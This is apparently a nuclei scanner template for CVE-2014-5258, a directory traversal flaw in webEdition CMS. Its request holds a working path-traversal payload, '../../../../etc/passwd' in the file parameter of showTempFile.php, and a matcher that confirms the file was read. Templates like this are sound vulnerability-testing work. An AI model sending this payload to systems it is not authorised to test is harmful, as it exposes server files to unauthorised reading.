nuclei-templates/cves/2014/CVE-2014-5258.yaml

32 lines
808 B
YAML

id: CVE-2014-5258
info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5258
- https://www.exploit-db.com/exploits/34761
tags: cve,cve2014,lfi
classification:
cve-id: CVE-2014-5258
requests:
- method: GET
path:
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25